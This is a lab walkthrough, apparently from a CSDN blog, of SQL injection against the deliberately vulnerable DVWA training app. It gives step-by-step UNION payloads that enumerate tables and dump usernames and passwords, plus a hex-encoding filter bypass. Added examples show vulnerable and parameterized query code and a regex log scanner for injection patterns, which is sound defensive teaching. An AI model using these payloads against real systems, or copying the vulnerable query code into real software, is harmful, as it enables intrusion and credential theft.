SQL injection of DVWA (1)

1. Low level

1. Enter an ID and check the echoed output.

2. Determine the injection type:

Enter 1' and '1' = '1' # : the echo succeeds.
Enter 1' and '1' = '2' # : the echo fails.
So it is judged to be single-quote string injection.

3. Determine the number of columns and the echo positions

Use an ORDER BY clause to determine the number of columns.

Enter 1' order by 3 # : an error occurs.
Enter 1' order by 2 # : the echo succeeds, so the query has 2 columns.

4. Use a UNION query to find the echo positions and get the current database

Enter -1' union select 1 , 2 # to find the echo positions: both values are echoed, so both columns are displayed on the page.

Use the database() function to get the current database.

5. Get the table names

Enter -1' union select 1 , group_concat(table_name) from information_schema.tables where table_schema = 'dvwa' # to get the table names.

6. Get the field names

Enter -1' union select 1 , group_concat(column_name) from information_schema.columns where table_name = 'users' # to get the field names.

7. Obtain the key information (user names and passwords)

Enter -1' union select user , password from users # to get the user names and passwords.

Key statement in the source code: (screenshot)

2. Medium level

The ID is now a drop-down list rather than an input box, so Burp Suite is used to capture the request and modify it for injection.

Determining the injection type and the database name works the same way as before: this time it is numeric injection, and the database name is 'voice'.

Determine the table names

When determining the table names, the statement -1 union select 1 , group_concat(table_name) from information_schema.tables where table_schema = 'dvwa' # produces an error.

Checking the source code shows that special characters are filtered out, so the SQL statement is adjusted:

-1 union select 1 , group_concat(table_name) from information_schema.tables where table_schema = database() #
Or convert the database name dvwa to its hex encoding 0x64767761 to bypass the filter.

Determine the field names

In the same way, use the hex encoding 0x7573657273 for the table name users.

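The three query patterns this walkthrough runs into, reproduced as an added example that is not DVWA's code: a single-quoted ID concatenated into the statement (the low level), an unquoted numeric ID behind a quote-escaping filter (the medium level, where escaping special characters still lets -1 union select 1, 2 through because no quote is needed to break out), and the hardened form that checks the type and binds the value as a parameter. The table, its rows and the use of SQLite in place of MySQL are constructed; the escaping filter is an assumed stand-in for the one the source code screenshot shows, and because SQLite's line comment is -- rather than #, the union payload is written that way here.

```python
import sqlite3

# Constructed in-memory stand-in for the users table the walkthrough reads from
# (SQLite instead of MySQL; sample rows, not DVWA's schema or data).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                 [(1, "admin", "admin"), (2, "gordon", "brown")])
conn.commit()


def run(sql):
    """Execute one statement; return the rows, or None if the SQL fails to parse,
    which is what the walkthrough reports as 'an error occurred'."""
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None


def lookup_low(user_id):
    """Low level: the ID is dropped into a single-quoted string by concatenation,
    so a quote in the input ends the string and the rest is parsed as SQL."""
    return run(f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'")


def escape_quotes(value):
    """Assumed stand-in for a quote-escaping filter (the 'special characters are
    filtered' step at the medium level): backslash-escapes backslashes and quotes."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def lookup_medium(user_id):
    """Medium level: quotes are escaped, but the ID sits in an unquoted numeric
    context, so input that contains no quote is still parsed as SQL."""
    return run(f"SELECT first_name, last_name FROM users WHERE user_id = {escape_quotes(user_id)}")


def lookup_fixed(user_id):
    """Hardened form: check the type first, then bind the value as a parameter so
    the database never sees user input as part of the statement text."""
    try:
        uid = int(user_id)
    except (TypeError, ValueError):
        return []   # not a plain integer id: refuse before touching the database
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (uid,)
    ).fetchall()


if __name__ == "__main__":
    # The boolean test from step 2 and the column-marker union from step 4.
    print(lookup_low("1' and '1'='1"))             # the row for id 1 comes back
    print(lookup_low("1' and '1'='2"))             # nothing: the condition is false
    print(lookup_low("-1' union select 1, 2 -- ")) # the marker row (1, 2) is echoed
    print(lookup_medium("1' and '1'='1"))          # None: the escaped quote breaks the SQL
    print(lookup_medium("-1 union select 1, 2"))   # the marker row is still echoed
    print(lookup_fixed("-1 union select 1, 2"))    # []: rejected by the type check
```

With the fixed version the low-level test payloads look up a literal that matches no row, and the numeric payload is refused before any SQL runs; escaping is at best a second line of defence, since it only protects quoted string contexts and does nothing for the numeric context the medium level uses.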
3. High level

A separate page is opened for entering the ID, to hinder automated injection tools.

The judgment steps are the same as before, and it is determined to be single-quote string injection.

Refer to the low-level injection above.
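On the detection side, a small scanner for the request patterns the three levels produce, written as an added example (not from the original post) over constructed Apache-style access-log lines; the path /lookup, the client address and the timestamps are placeholders, and the id= values are the URL-encoded forms of the payloads used above. It decodes the query string and flags ORDER BY column probes, a quote followed by a # or -- comment terminator, UNION SELECT, information_schema/group_concat/database() lookups, hex literals such as 0x64767761, and quote tautologies like '1'='1.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed Apache combined-format access-log lines (sample data, not from the post).
# The path /lookup, the client address and the timestamps are placeholders.
LOG_LINES = [
    '10.0.0.5 - - [21/Jan/2021:10:00:01 +0000] "GET /lookup?id=1&Submit=Submit HTTP/1.1" 200 4321',
    '10.0.0.5 - - [21/Jan/2021:10:00:09 +0000] "GET /lookup?id=1%27+and+%271%27%3D%271&Submit=Submit HTTP/1.1" 200 4321',
    '10.0.0.5 - - [21/Jan/2021:10:00:15 +0000] "GET /lookup?id=1%27+order+by+3+%23&Submit=Submit HTTP/1.1" 200 3980',
    '10.0.0.5 - - [21/Jan/2021:10:00:22 +0000] "GET /lookup?id=-1%27+union+select+1%2C+group_concat%28table_name%29+from+information_schema.tables+where+table_schema+%3D+0x64767761+%23&Submit=Submit HTTP/1.1" 200 4410',
    '10.0.0.5 - - [21/Jan/2021:10:00:30 +0000] "POST /lookup HTTP/1.1" 200 4321',
]

# Indicator name and the regex applied to each decoded, lower-cased,
# whitespace-normalised parameter value.
INDICATORS = [
    ("union_select",       re.compile(r"\bunion\b[\s/*]+select\b")),
    ("order_by_probe",     re.compile(r"\border\s+by\s+\d+")),
    ("schema_lookup",      re.compile(r"information_schema\.|group_concat\(|database\(\)")),
    ("hex_literal",        re.compile(r"\b0x[0-9a-f]{4,}\b")),
    ("quote_then_comment", re.compile(r"'[^']*(#|--)\s*$")),
    ("tautology",          re.compile(r"'\s*(and|or)\s*'[^']*'\s*=\s*'")),
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decoded_params(line):
    """Pull the request target out of a log line and return its query parameters
    percent-decoded (parse_qs also turns '+' into spaces), lower-cased and with
    runs of whitespace collapsed to one space."""
    m = REQUEST_RE.search(line)
    if not m:
        return {}
    params = parse_qs(urlparse(m.group("target")).query, keep_blank_values=True)
    return {k: [" ".join(v.lower().split()) for v in vals] for k, vals in params.items()}


def indicators_for(line):
    """Sorted list of indicator names matched by any parameter value in the line."""
    hits = set()
    for values in decoded_params(line).values():
        for value in values:
            for name, rx in INDICATORS:
                if rx.search(value):
                    hits.add(name)
    return sorted(hits)


def scan(lines):
    """(index, indicators) for every line that triggers at least one indicator."""
    return [(i, hits) for i, line in enumerate(lines) if (hits := indicators_for(line))]


if __name__ == "__main__":
    for i, hits in scan(LOG_LINES):
        print(f"line {i}: {', '.join(hits)}")
```

Two caveats for anyone deploying something like this: the medium level submits the ID in a POST body, which an access log does not record, so catching it needs a WAF or application-level request logging; and a keyword detector that normalises only case and whitespace will not see every obfuscated payload, so treat its hits as a triage signal rather than a blocking rule.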

Source: blog.csdn.net/qq_45742511/article/details/112960778